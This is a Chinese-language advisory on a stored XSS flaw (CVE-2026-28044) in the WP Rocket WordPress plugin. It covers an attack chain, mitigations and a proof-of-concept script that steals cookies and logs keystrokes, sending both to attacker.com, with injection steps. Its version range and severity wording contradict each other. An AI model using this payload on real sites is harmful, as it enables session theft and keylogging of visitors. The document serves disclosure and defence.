CVE-2026-28044: WP Rocket 3.19.4及之前版本存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2026-28044

漏洞类型

存储型跨站脚本攻击(XSS)

CVSS评分

5.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

WP Media WP Rocket

漏洞概述

CVE-2026-28044是WP Media公司开发的WordPress缓存插件WP Rocket中的一个高危安全漏洞。该漏洞属于存储型跨站脚本攻击（Stored XSS），允许攻击者在网页生成过程中不当处理用户输入，导致恶意JavaScript代码被永久存储在服务器端。当其他用户访问包含恶意代码的页面时，攻击脚本会在受害者浏览器中执行，从而窃取会话令牌、劫持用户账户、进行钓鱼攻击或传播恶意软件。WP Rocket作为全球最受欢迎的WordPress性能优化插件之一，被数以百万计的网站使用。由于该漏洞影响版本从n/a到3.19.4，范围较广，且利用难度相对较低，攻击者可利用此漏洞对大量WordPress网站发起攻击，对网站访问者的安全造成严重威胁。建议所有使用WP Rocket插件的用户立即检查并更新到最新版本，以防止潜在的安全风险。

技术细节

该漏洞源于WP Rocket插件在处理用户输入时未能正确对特殊字符进行HTML转义。攻击者可以通过在插件的某个输入字段（如缓存预加载URL、自定义CSS设置或文件优化选项等）中注入恶意JavaScript代码。由于插件未对输入内容进行充分的输入验证和输出编码，这些恶意代码会被永久存储在数据库或生成的缓存文件中。当网站管理员或其他用户访问受影响的页面时，浏览器会解析并执行这些存储的恶意脚本。存储型XSS相比反射型XSS更为危险，因为恶意代码不需要通过钓鱼链接诱导用户点击，而是直接存在于网站页面中。攻击者通常需要拥有WordPress后台的高权限账户（如管理员或编辑角色）才能成功注入恶意代码。CVSS向量显示该漏洞需要高权限认证(PR:H)和用户交互(UI:R)，但一旦成功利用，攻击者可执行任意客户端脚本，窃取敏感信息或进一步提权。

攻击链分析

STEP 1

步骤1: 侦察与权限获取

攻击者通过社会工程、密码喷洒或漏洞利用等方式获取WordPress网站的管理员或高级权限账户凭据

STEP 2

步骤2: 注入恶意代码

使用获取的高权限账户登录WordPress后台，导航至WP Rocket插件设置页面，在Custom CSS、Preload URL或其他输入字段中注入包含恶意JavaScript的XSS payload

STEP 3

步骤3: 持久化存储

保存设置后，恶意代码被存储在WordPress数据库的wp_options表中或写入缓存文件，实现持久化

STEP 4

步骤4: 等待受害者访问

当网站管理员或其他用户访问包含恶意代码的页面时，浏览器会解析并执行存储的JavaScript脚本

STEP 5

步骤5: 敏感信息窃取

恶意脚本在受害者浏览器中执行，窃取Cookie、会话令牌、用户凭据等敏感信息，并将数据发送到攻击者控制的服务器

STEP 6

步骤6: 账户劫持与横向移动

攻击者利用窃取的凭据劫持受害者账户，进一步获取更高权限或横向移动到其他相关系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2026-28044 Stored XSS PoC for WP Rocket <= 3.19.4 -->
<!-- This PoC demonstrates how an attacker with high privileges can inject malicious JavaScript -->

<!-- Malicious payload to be injected into WP Rocket settings -->
<script>
  // Cookie stealing payload
  document.write('<img src="http://attacker.com/steal?cookie=' + document.cookie + '">');
  
  // Keylogger payload
  document.addEventListener('keypress', function(e) {
    var key = String.fromCharCode(e.which);
    new Image().src = 'http://attacker.com/log?key=' + key;
  });
  
  // Session hijacking - redirect to fake login page
  if (!sessionStorage.getItem('hijacked')) {
    sessionStorage.setItem('hijacked', 'true');
    // Malicious actions can be performed here
  }
</script>

<!-- Example injection via WordPress admin interface -->
<!-- Steps: -->
<!-- 1. Login to WordPress admin with administrator privileges -->
<!-- 2. Navigate to Settings > WP Rocket -->
<!-- 3. Go to 'Custom CSS' or 'Preload' settings -->
<!-- 4. Inject the above script payload -->
<!-- 5. Save settings - payload is now stored -->
<!-- 6. Any user visiting pages with cached content will execute the script -->

影响范围

WP Rocket < 3.19.4

防御指南

临时缓解措施

在无法立即升级插件的情况下，可采取以下临时缓解措施：1）禁用或删除WP Rocket插件，直到完成安全更新；2）使用WordPress安全插件限制用户角色权限，禁止低权限用户访问插件设置；3）在Web服务器层面配置严格的Content-Type和X-Content-Type-Options头部；4）临时移除所有自定义CSS和高级设置中的用户输入内容；5）使用Cloudflare等CDN服务启用高级安全规则过滤恶意脚本。建议在48小时内完成版本升级，因为临时措施可能无法完全阻止攻击。